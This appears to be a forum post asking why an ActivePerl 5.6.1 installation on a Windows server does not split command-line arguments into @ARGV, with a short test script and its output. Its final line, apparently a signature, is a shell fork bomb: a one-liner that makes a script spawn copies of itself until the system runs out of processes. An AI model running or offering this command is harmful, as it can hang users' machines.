I seem to be having some trouble with a ActivePerl installation. In particular, it doesn't seem to handle @ARGV correctly. Here's my test code:
use strict;
use warnings;
my $first = shift(@ARGV);
my $second = shift(@ARGV);
my $third = shift(@ARGV);
print "$first\n";
print "$second\n";
print "$third\n";
On this server, running it looks like this:
D:\argv_test.pl I like code
I like code
D:\
On the other hand, it works as expected on my workstation:
C:\>argv_test.pl I like code
I
like
code
C:\>
Both installations are vanilla ActivePerl v5.6.1.
Any ideas?
Thanks!
ibanix
$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;
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